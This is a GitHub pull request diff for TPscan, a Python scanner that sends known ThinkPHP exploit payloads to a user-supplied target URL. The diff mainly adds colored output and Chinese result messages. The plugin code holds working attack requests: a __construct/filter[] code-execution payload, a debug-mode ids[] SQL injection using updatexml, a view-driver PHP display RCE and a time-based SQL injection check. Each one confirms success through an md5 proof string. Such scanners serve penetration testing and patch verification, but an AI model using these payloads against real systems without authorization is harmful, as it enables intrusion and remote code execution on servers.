Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

2023.11.01更新检测回显 #13

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

2023.11.01更新检测回显 #13

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions .gitignore
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
.idea
*__pycache__
2 changes: 2 additions & 0 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,2 +1,4 @@
# TPscan
一键ThinkPHP漏洞检测,基于Python3

![](https://raw.githubusercontent.com/pfinal-nc/iGallery/master/blog/202311011758502.png)
13 changes: 10 additions & 3 deletions TPscan.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,10 @@
#!/usr/bin/env python
# coding=utf-8
from gevent import monkey;monkey.patch_all()
from gevent import monkey;

monkey.patch_all()
from gevent.pool import Pool
from termcolor import colored
from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
Expand All @@ -19,6 +22,7 @@

import sys
import gevent

print('''
___________
|_ _| ___ \
Expand All @@ -29,7 +33,8 @@
code by Lucifer
''')
targeturl = input("[*]Give me a target: ")
if targeturl.find('http') == -1:
if targeturl.find('http') == -1 and targeturl.find('https') == -1:
print(colored("\n[*]Please input a valid url!", "red"))
exit(1)
poclist = [
'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl),
Expand All @@ -48,10 +53,12 @@
'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl),
]


def pocexec(pocstr):
exec(pocstr)
gevent.sleep(0)


pool = Pool(10)
threads = [pool.spawn(pocexec, item) for item in poclist]
gevent.joinall(threads)
gevent.joinall(threads)
Empty file added img.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
31 changes: 20 additions & 11 deletions plugins/thinkphp_checkcode_time_sqli.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,22 +2,28 @@
# coding=utf-8
import time
import urllib

import requests
import urllib3
from termcolor import colored

urllib3.disable_warnings()


def thinkphp_checkcode_time_sqli_verify(url):
"""thinkphp_checkcode_time_sqli_verify"""

pocdict = {
"vulnname":"thinkphp_checkcode_time_sqli",
"vulnname": "thinkphp_checkcode_time_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Content-Type": "multipart/form-data; boundary=--------641902708",
Expand All @@ -34,8 +40,11 @@ def thinkphp_checkcode_time_sqli_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = 'time sleep 15'
pocdict['response'] = req.text
print(pocdict)

except:
pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_checkcode_time_sqli 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red"))
except Exception as e:
print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red"))
pass
34 changes: 20 additions & 14 deletions plugins/thinkphp_construct_code_exec.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,26 +3,30 @@
import urllib
import requests
import urllib3
from termcolor import colored

urllib3.disable_warnings()


def thinkphp_construct_code_exec_verify(url):
"""thinkphp_construct_code_exec_verify"""
pocdict = {
"vulnname":"thinkphp_construct_code_exec",
"vulnname": "thinkphp_construct_code_exec",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'var_dump',
'method':'get',
'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294',
'_method': '__construct',
'filter[]': 'var_dump',
'method': 'get',
'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=captcha')
Expand All @@ -32,8 +36,10 @@ def thinkphp_construct_code_exec_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3ea'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_construct_code_exec 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_construct_code_exec 漏洞", "red"))
except:
pass
33 changes: 20 additions & 13 deletions plugins/thinkphp_construct_debug_rce.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,25 +3,29 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_construct_debug_rce_verify(url):
"""thinkphp_construct_debug_rce_verify"""
pocdict = {
"vulnname":"thinkphp_construct_debug_rce",
"vulnname": "thinkphp_construct_debug_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'var_dump',
'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294',
'_method': '__construct',
'filter[]': 'var_dump',
'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php')
Expand All @@ -31,8 +35,11 @@ def thinkphp_construct_debug_rce_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_construct_debug_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red"))
pass
27 changes: 17 additions & 10 deletions plugins/thinkphp_debug_index_ids_sqli.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,20 +3,24 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_debug_index_ids_sqli_verify(url):
"""thinkphp_debug_index_ids_sqli_verify"""
pocdict = {
"vulnname":"thinkphp_debug_index_ids_sqli",
"vulnname": "thinkphp_debug_index_ids_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : "TPscan",
"User-Agent": "TPscan",
}
payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1'
try:
Expand All @@ -26,8 +30,11 @@ def thinkphp_debug_index_ids_sqli_verify(url):
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_debug_index_ids_sqli 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red"))
pass
27 changes: 17 additions & 10 deletions plugins/thinkphp_driver_display_rce.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,20 +3,24 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_driver_display_rce_verify(url):
"""thinkphp_driver_display_rce_verify"""
pocdict = {
"vulnname":"thinkphp_driver_display_rce",
"vulnname": "thinkphp_driver_display_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent" : 'TPscan',
"User-Agent": 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E')
Expand All @@ -25,8 +29,11 @@ def thinkphp_driver_display_rce_verify(url):
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_driver_display_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red"))
pass
26 changes: 16 additions & 10 deletions plugins/thinkphp_index_construct_rce.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,17 +3,21 @@
import urllib
import requests
import urllib3

urllib3.disable_warnings()
from termcolor import colored


def thinkphp_index_construct_rce_verify(url):
"""thinkphp_index_construct_rce_verify"""
pocdict = {
"vulnname":"thinkphp_index_construct_rce",
"vulnname": "thinkphp_index_construct_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
"vulnurl": "",
"payload": "",
"proof": "",
"response": "",
"exception": "",
}
headers = {
"User-Agent": 'TPscan',
Expand All @@ -28,9 +32,11 @@ def thinkphp_index_construct_rce_verify(url):
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3ea'
pocdict['response'] = req.text
print(pocdict)

pocdict['response'] = req.status_code
print(colored("[+] 目标存在 thinkphp_index_construct_rce 漏洞\tpayload: ", "green"))
print(colored(pocdict, 'green'))
else:
print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red"))
except:
print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red"))
pass

Loading